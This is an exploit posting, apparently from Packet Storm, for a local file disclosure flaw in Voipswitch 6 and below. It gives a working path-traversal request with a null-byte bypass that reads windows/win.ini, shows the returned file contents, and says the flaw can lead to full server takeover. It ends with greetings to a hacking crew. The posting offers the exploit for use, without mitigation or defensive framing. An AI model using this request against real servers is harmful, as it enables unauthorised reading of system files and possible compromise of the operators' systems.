Voipswitch versions 6 and below suffer fro a local file inclusion vulnerability.
99285209e2a9d1ba5bc478592fac9872c9517a0e41ce98337f1faa3cc15c2ca5# Voipswitch <= 6 , LFD Exploit
# Author : 0x4148
Voipswitch’s Unified Communication enables providers to offer a hosted
business communication solution.
Enterprises, instead of maintaining costly on-premises PBXes, can now
enroll to a service in the cloud – Unified Communication as a Service
(UCaaS).
Voipswitch suffer from LFD vuln which can lead to full server take over
Exploit : http://ip:port/user.php?action=../../../windows/win.ini%00.jpg
Result
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
For my masters @ Eg-R1z cr3w : That's it :)
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed